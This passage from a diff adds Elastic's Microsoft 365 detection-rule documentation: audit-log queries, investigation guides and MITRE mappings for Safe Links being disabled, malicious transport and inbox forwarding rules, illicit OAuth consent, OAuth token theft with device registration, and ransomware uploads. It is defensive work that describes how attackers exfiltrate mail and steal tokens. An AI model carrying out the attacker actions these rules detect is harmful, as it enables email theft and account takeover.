365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Safe Link Policy Disabled* + + +Microsoft 365's Safe Link policies enhance security by scanning hyperlinks in documents for phishing threats, even post-delivery. Disabling these policies can expose users to phishing attacks. Adversaries might exploit this by disabling Safe Links to facilitate malicious link delivery. The detection rule identifies successful attempts to disable Safe Link policies, signaling potential security breaches. + + +*Possible investigation steps* + + +- Review the event logs for the specific event.dataset:o365.audit and event.provider:Exchange to confirm the occurrence of the "Disable-SafeLinksRule" action with a successful outcome. +- Identify the user account associated with the event.action:"Disable-SafeLinksRule" to determine if the action was performed by an authorized individual or if the account may have been compromised. +- Check the recent activity of the identified user account for any unusual or unauthorized actions that could indicate a broader security incident. +- Investigate any recent changes to Safe Link policies in the Microsoft 365 environment to understand the scope and impact of the policy being disabled. +- Assess whether there have been any recent phishing attempts or suspicious emails delivered to users, which could exploit the disabled Safe Link policy. +- Coordinate with the IT security team to re-enable the Safe Link policy and implement additional monitoring to prevent future unauthorized changes. + + +*False positive analysis* + + +- Administrative changes: Legitimate administrative actions may involve disabling Safe Link policies temporarily for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Third-party integrations: Some third-party security tools or integrations might require Safe Link policies to be disabled for compatibility reasons. Identify and document these tools, and set up exceptions for their associated actions. +- Policy updates: During policy updates or migrations, Safe Link policies might be disabled as part of the process. Monitor and document these events, and exclude them from alerts if they match known update patterns. +- User training sessions: Safe Link policies might be disabled during user training or demonstrations to showcase potential threats. Schedule these sessions and exclude related activities from triggering alerts. + + +*Response and remediation* + + +- Immediately re-enable the Safe Link policy in Microsoft 365 to restore phishing protection for hyperlinks in documents. +- Conduct a thorough review of recent email and document deliveries to identify any potentially malicious links that may have been delivered while the Safe Link policy was disabled. +- Isolate any identified malicious links or documents and notify affected users to prevent interaction with these threats. +- Investigate the account or process that disabled the Safe Link policy to determine if it was compromised or misused, and take appropriate actions such as password resets or privilege revocation. +- Escalate the incident to the security operations team for further analysis and to determine if additional security measures are needed to prevent similar incidents. +- Implement additional monitoring and alerting for changes to Safe Link policies to ensure rapid detection of any future unauthorized modifications. +- Review and update access controls and permissions related to Safe Link policy management to ensure only authorized personnel can make changes. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Disable-SafeLinksRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc new file mode 100644 index 0000000000..4ebf607466 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation]] +=== Microsoft 365 Exchange Transport Rule Creation + +Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Transport Rule Creation* + + +Microsoft 365 Exchange transport rules automate email handling, applying actions like forwarding or blocking based on conditions. While beneficial for managing communications, adversaries can exploit these rules to redirect emails externally, facilitating data exfiltration. The detection rule monitors successful creation of new transport rules, flagging potential misuse by identifying specific actions and outcomes in audit logs. + + +*Possible investigation steps* + + +- Review the audit logs for the event.dataset:o365.audit to identify the user account responsible for creating the new transport rule. +- Examine the event.provider:Exchange and event.category:web fields to confirm the context and source of the rule creation. +- Investigate the event.action:"New-TransportRule" to understand the specific conditions and actions defined in the newly created transport rule. +- Check the event.outcome:success to ensure the rule creation was completed successfully and assess if it aligns with expected administrative activities. +- Analyze the transport rule settings to determine if it includes actions that forward emails to external domains, which could indicate potential data exfiltration. +- Correlate the findings with other security events or alerts to identify any patterns or anomalies that might suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when IT staff create or modify transport rules for legitimate purposes. To manage this, establish a baseline of expected rule creation activities and exclude these from alerts. +- Automated systems or third-party applications that integrate with Microsoft 365 might create transport rules as part of their normal operation. Identify these systems and create exceptions for their known actions. +- Changes in organizational policies or email handling procedures can lead to legitimate rule creations. Document these changes and update the monitoring system to recognize them as non-threatening. +- Regular audits or compliance checks might involve creating temporary transport rules. Coordinate with audit teams to schedule these activities and temporarily adjust alert thresholds or exclusions during these periods. + + +*Response and remediation* + + +- Immediately disable the newly created transport rule to prevent further unauthorized email forwarding or data exfiltration. +- Conduct a thorough review of the audit logs to identify any other suspicious transport rules or related activities that may indicate a broader compromise. +- Isolate the affected user accounts or systems associated with the creation of the transport rule to prevent further unauthorized access or actions. +- Reset passwords and enforce multi-factor authentication for the affected accounts to secure access and prevent recurrence. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of a broader compromise or if sensitive data has been exfiltrated. +- Implement enhanced monitoring and alerting for transport rule changes to detect and respond to similar threats more effectively in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"New-TransportRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc new file mode 100644 index 0000000000..053bd58fcb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification]] +=== Microsoft 365 Exchange Transport Rule Modification + +Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Transport Rule Modification* + + +Microsoft 365 Exchange transport rules manage email flow by setting conditions and actions for messages. Adversaries may exploit these rules to disable or delete them, facilitating data exfiltration or bypassing security measures. The detection rule monitors audit logs for successful execution of commands that alter these rules, signaling potential misuse and enabling timely investigation. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the "Remove-TransportRule" or "Disable-TransportRule" actions. +- Identify the user account associated with the event by examining the user information in the audit logs to determine if the action was performed by an authorized individual or a potential adversary. +- Check the event.category:web context to understand if the action was performed through a web interface, which might indicate a compromised account or unauthorized access. +- Investigate the event.outcome:success to ensure that the rule modification was indeed successful and not an attempted action. +- Correlate the timing of the rule modification with other security events or alerts to identify any concurrent suspicious activities that might suggest a broader attack or data exfiltration attempt. +- Assess the impact of the rule modification by reviewing the affected transport rules to determine if they were critical for security or compliance, and evaluate the potential risk to the organization. + + +*False positive analysis* + + +- Routine administrative changes to transport rules by IT staff can trigger alerts. To manage this, maintain a list of authorized personnel and their expected activities, and create exceptions for these users in the monitoring system. +- Scheduled maintenance or updates to transport rules may result in false positives. Document these activities and adjust the monitoring system to temporarily exclude these events during known maintenance windows. +- Automated scripts or third-party tools that manage transport rules might cause alerts. Identify these tools and their typical behavior, then configure the monitoring system to recognize and exclude these benign actions. +- Changes made as part of compliance audits or security assessments can be mistaken for malicious activity. Coordinate with audit teams to log these activities separately and adjust the monitoring system to account for these legitimate changes. + + +*Response and remediation* + + +- Immediately disable any compromised accounts identified in the audit logs to prevent further unauthorized modifications to transport rules. +- Revert any unauthorized changes to transport rules by restoring them to their previous configurations using backup data or logs. +- Conduct a thorough review of all transport rules to ensure no additional unauthorized modifications have been made, and confirm that all rules align with organizational security policies. +- Implement additional monitoring on the affected accounts and transport rules to detect any further suspicious activities or attempts to modify rules. +- Escalate the incident to the security operations team for a deeper investigation into potential data exfiltration activities and to assess the scope of the breach. +- Coordinate with legal and compliance teams to determine if any regulatory reporting is required due to potential data exfiltration. +- Enhance security measures by enabling multi-factor authentication (MFA) for all administrative accounts and reviewing access permissions to ensure the principle of least privilege is enforced. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-TransportRule" or "Disable-TransportRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc new file mode 100644 index 0000000000..d2dc80ba36 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application]] +=== Microsoft 365 Illicit Consent Grant via Registered Application + +Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide +* https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/ +* https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps +* https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access +* Tactic: Credential Access + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft 365 Illicit Consent Grant via Registered Application* + + +Adversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These apps can access sensitive Microsoft 365 data—such as mail, profiles, and files—on behalf of the user once consent is granted. This activity is often initiated through spearphishing campaigns that direct the user to a pre-crafted OAuth consent URL. + +This rule identifies a new consent grant to an application using Microsoft 365 audit logs. Additionally, this is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days. + + +*Possible investigation steps* + + +- **Review the app in Entra ID**: + - Go to **Enterprise Applications** in the Azure portal. + - Search for the `AppId` or name from `o365.audit.ObjectId`. + - Review granted API permissions and whether admin consent was required. + - Check the `Publisher` and `Verified` status. + +- **Assess the user who granted consent**: + - Investigate `o365.audit.UserId` (e.g., `terrance.dejesus@...`) for signs of phishing or account compromise. + - Check if the user was targeted in recent phishing simulations or campaigns. + - Review the user’s sign-in logs for suspicious geolocation, IP, or device changes. + +- **Determine scope and risk**: + - Use the `ConsentContext_IsAdminConsent` and `ConsentContext_OnBehalfOfAll` flags to assess privilege level. + - If `offline_access` or `Mail.Read` was granted, consider potential data exposure. + - Cross-reference affected `Target` objects with known business-critical assets or data owners. + +- **Correlate additional telemetry**: + - Review logs from Defender for Cloud Apps (MCAS), Microsoft Purview, or other DLP tooling for unusual access patterns. + - Search for `AppId` across your tenant to determine how widely it's used. + + +*False positive analysis* + + +- Not all consent grants are malicious. Verify if the app is business-approved, listed in your app catalog, or commonly used by users in that role or department. +- Consent reasons like `WindowsAzureActiveDirectoryIntegratedApp` could relate to integrated services, though these still require verification. + + +*Response and remediation* + + +- **If the app is confirmed malicious**: + - Revoke OAuth consent using the https://learn.microsoft.com/en-us/graph/api/oauth2permissiongrant-delete[Microsoft Graph API]. + - Remove any related service principals from Entra ID. + - Block the app via the Conditional Access "Grant" control or Defender for Cloud Apps policies. + - Revoke refresh tokens and require reauthentication for affected users. + - Notify end-users and IT of the potential exposure. + - Activate your phishing or OAuth abuse response playbook. + +- **Prevent future misuse**: + - Enable the https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow[Admin consent workflow] to restrict user-granted consent. + - Audit and reduce overprivileged applications in your environment. + - Consider using Defender for Cloud Apps OAuth app governance. + + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "o365.audit" + and o365.audit.Actor.Type: 5 + and event.action: "Consent to application." + and event.outcome: "success" + and o365.audit.Target.Type: (0 or 2 or 3 or 9 or 10) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc new file mode 100644 index 0000000000..537d32f0b1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created]] +=== Microsoft 365 Inbox Forwarding Rule Created + +Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide +* https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic +* Gary Blackwell +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Inbox Forwarding Rule Created* + + +Microsoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities. + + +*Possible investigation steps* + + +- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters. +- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address. +- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange. +- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities. +- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise. +- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized. + + +*False positive analysis* + + +- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations. +- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule. +- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period. +- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule. +- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior. + + +*Response and remediation* + + +- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules. +- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings. +- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access. +- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure. +- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised. +- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes. +- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and +event.category:web and event.action:("New-InboxRule" or "Set-InboxRule") and + ( + o365.audit.Parameters.ForwardTo:* or + o365.audit.Parameters.ForwardAsAttachmentTo:* or + o365.audit.Parameters.RedirectTo:* + ) + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Email Forwarding Rule +** ID: T1114.003 +** Reference URL: https://attack.mitre.org/techniques/T1114/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc new file mode 100644 index 0000000000..b9a408b7bc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal]] +=== Microsoft 365 OAuth Redirect to Device Registration for User Principal + +Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-o365.audit-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 15m + +*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft 365 OAuth Redirect to Device Registration for User Principal* + + + +*Possible investigation steps* + +- Review the two UserLoggedIn logs to confirm that they come from different source.ip values and are associated to the same account. +- Verify all events associated to the source.ip of the the second event in the sequence. +- Investiguate the details of the new device that was added by reviewing the o365.audit.ModifiedProperties.Device_DisplayName.NewValue attribute. +- Investigate the user account associated with the successful sign-in to determine if this activity aligns with expected behavior or if it appears suspicious. +- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access. +- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user. + + +*False positive analysis* + +- Both authentcation events of the sequence are originatng from the same source.ip. +- User using multiple devices and attempted to add a new device post an OAuth code authentication. + + +*Response and remediation* + +- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions. +- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid. +- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse. +- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise. +- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts. +- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats. +- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by related.user with maxspan=30m +[authentication where event.action == "UserLoggedIn" and + o365.audit.ExtendedProperties.RequestType == "OAuth2:Authorize" and o365.audit.ExtendedProperties.ResultStatusDetail == "Redirect" and + o365.audit.UserType: ("0", "2", "3", "10")] // victim source.ip +[authentication where event.action == "UserLoggedIn" and + o365.audit.ExtendedProperties.RequestType == "OAuth2:Token" and o365.audit.ExtendedProperties.ResultStatusDetail == "Success"] // attacker source.ip to convert oauth code to token +[web where event.dataset == "o365.audit" and event.action == "Add registered users to device."] // user.name is captured in related.user + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc new file mode 100644 index 0000000000..bc9230fa5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity]] +=== Microsoft 365 Potential ransomware activity + +Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we 